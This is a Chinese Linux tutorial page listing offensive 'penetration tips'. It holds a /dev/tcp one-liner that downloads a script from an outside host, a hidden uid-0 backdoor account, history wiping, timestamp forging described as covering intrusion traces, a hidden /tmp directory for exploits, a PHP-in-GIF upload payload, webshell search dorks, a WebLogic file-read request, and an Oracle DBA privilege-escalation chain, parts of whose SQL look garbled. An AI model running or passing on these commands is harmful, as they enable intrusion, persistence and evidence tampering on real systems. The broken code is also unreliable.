歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
Linux教程網 >> Linux基礎 >> Linux教程 >> 送給Linux滲透愛好者的小技巧

送給Linux滲透愛好者的小技巧

日期:2017/2/28 16:27:06   编辑:Linux教程

1.無wget nc等下載工具時下載文件
exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl

2.Linux添加uid為0的用戶
useradd -o -u 0 cnbird

3.bash去掉history記錄
export HISTSIZE=0
export HISTFILE=/dev/null

4.SSH反向鏈接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定遠端服務器SSH端口
然後服務器上執行ssh localhost -p 44即可

5.weblogic本地讀取文件漏洞
curl -H "wl_request_type: wl_xml_entity_request" -H "xml-registryname: ../../" -H "xml-entity-path: config.xml" http://server/wl_management_internal2/wl_management

6.apache查看虛擬web目錄
./httpd -t -D DUMP_VHOSTS

7.cvs滲透技巧
CVSROOT/passwd UNIX SHA1的密碼文件
CVSROOT/readers
CVSROOT/writers
CVS/Root
CVS/Entries 更新的文件和目錄內容
CVS/Repository

8.Cpanel路徑洩露
/3rdparty/squirrelmail/functions/plugin.php

9.修改上傳文件時間戳(掩蓋入侵痕跡)
touch -r 老文件時間戳 新文件時間戳

10.利用baidu和google搜索目標主機webshell
intitle:PHPJackal 1t1t

11.包總補充
創建臨時“隱藏”目錄 mkdir /tmp/...
/tmp/...目錄在管理員有宿醉的情況下是“隱藏”的,可以臨時放點exp啥的

12.利用linux輸出繞過gif限制的圖片
printf "GIF89a\x01\x00\x01\x00<?php phpinfo();?>" > poc.php

13.讀取環境變量對於查找信息非常有幫助
/proc/self/environ

14.最新的Oracle 11提升用戶權限(只要session權限)
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判斷登陸權限
select * from session_privs;
Create SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = 'GREMLIN(用戶名)';

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS Select 'GRANT' USER(), 'SYS', 'java.io.FilePermission', '<<ALL FILES>>', 'execute', 'ENABLE' FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = '用戶';

connect 普通用戶
set serveroutput on
exec dbms_java.set_output(10000);

Select DBMS_JAVA.SET_OUTPUT_TO_JAVA('ID', 'oracle/aurora/rdbms/DbmsJava', 'SYS', 'writeOutputToFile', 'TEXT', NULL, NULL, NULL, NULL,0,1,1,1,1,0, 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO 用戶''; END;', 'BEGIN NULL; END;') FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS('NO_SUCH_SUBSCRIPTION', SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC('FOO"||DBMS_JAVA.SET_OUTPUT_TO_SQL("ID","DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE""GRANT DBA TO PUBLIC"";DBMS_OUTPUT.PUT_LINE(:1);END;","TEXT")||"BAR');

Select DBMS_JAVA.RUNJAVA('oracle/aurora/util/Test') FROM DUAL;
SET ROLE DBA;

15. webLogic滲透技巧
四. Weblogin Script Tool(WLST)

寫入到<Domain_home>\\config\\config.xml

1.進行修改:
<bea_home>\wlserver_10.0\server\bin\setWLSenv.sh
2.啟動WLST 【LINUX公社 www.LinuxIDC.com 】
java weblogic.WLST

wls:/offline> connect('admin', 'admin', 't3://127.0.0.1:7001')
wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd('Servers')
wls:/bbk/serverConfig/Server-cnbird> cd('Log')
wls:/bbk/serverConfig/Server-cnbird/log> cd('Server-cnbird')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set('FileCount', '4')
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交對應Active Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
wls:/offline> exit()

3.批處理:
保存以上命令為cnbird.py
connect('admin', 'admin', 't3://127.0.0.1:7001')
cd('Servers')
cd('Log')
cd('Server-cnbird')
startEdit()
set('FileCount', '4')
save()
然後執行java weblogic.WLST cnbird.py

Copyright © Linux教程網 All Rights Reserved